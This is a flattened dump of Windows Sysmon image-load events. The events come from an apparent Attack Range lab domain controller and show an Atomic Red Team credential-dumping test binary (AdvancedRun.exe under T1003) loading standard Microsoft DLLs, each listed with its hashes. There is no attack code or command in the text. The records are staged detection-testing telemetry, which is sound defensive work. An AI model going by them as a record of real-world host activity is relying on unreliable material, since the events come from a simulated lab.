SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.950{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.950{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.950{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.950{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.950{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.950{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979835Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979831Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979830Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979829Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979828Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979826Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979825Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979824Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979822Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979821Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979820Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979819Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.903{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.903{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.903{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979814Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979813Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979812Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979811Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979810Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.871{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979800Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979799Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft 